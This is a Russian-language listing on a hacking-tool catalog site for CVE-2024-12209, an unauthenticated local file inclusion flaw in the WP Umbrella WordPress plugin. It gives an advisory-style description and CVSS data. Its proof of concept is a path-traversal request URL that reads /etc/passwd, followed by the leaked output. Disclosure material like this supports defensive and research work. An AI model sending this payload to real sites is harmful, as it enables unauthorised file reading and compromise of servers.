Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-12209 — WP Umbrella: Обновление, Резервное копирование, Восстановление и Мониторинг <= 2.17.0 - Неавторизованное локальное включение файла | Kitploit
Инструменты/GitHubGitHub/randomrobbiebf/cve-2024-12209
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubrandomrobbiebf/cve-2024-12209

CVE-2024-12209

WP Umbrella: Обновление, Резервное копирование, Восстановление и Мониторинг <= 2.17.0 - Неавторизованное локальное включение файла

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-12209

WP Umbrella: Update Backup Restore & Monitoring <= 2.17.0 - Неаутентифицированное локальное включение файла

Описание

Плагин WP Umbrella: Update Backup Restore & Monitoring для WordPress уязвим к локальному включению файлов во всех версиях до 2.17.0 включительно через параметр 'filename' действия 'umbrella-restore'. Это позволяет неаутентифицированным злоумышленникам включать и выполнять произвольные файлы на сервере, что даёт возможность выполнять любой PHP-код в этих файлах. Это может быть использовано для обхода контроля доступа, получения конфиденциальных данных или выполнения кода в тех случаях, когда можно загружать и включать изображения и другие «безопасные» типы файлов.

Подробности

  • Тип: плагин
  • Slug: wp-health
  • Затронутая версия: 2.17.0
  • Оценка CVSS: 9.8
  • Уровень CVSS: Критический
  • Вектор CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-12209
  • Статус: Активный

POC

root@kitploit:~
https://wp-dev.ddev.site/?umbrella-restore=1&filename=../../../../../../etc/passwd
root@kitploit:~
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
Скачать инструмент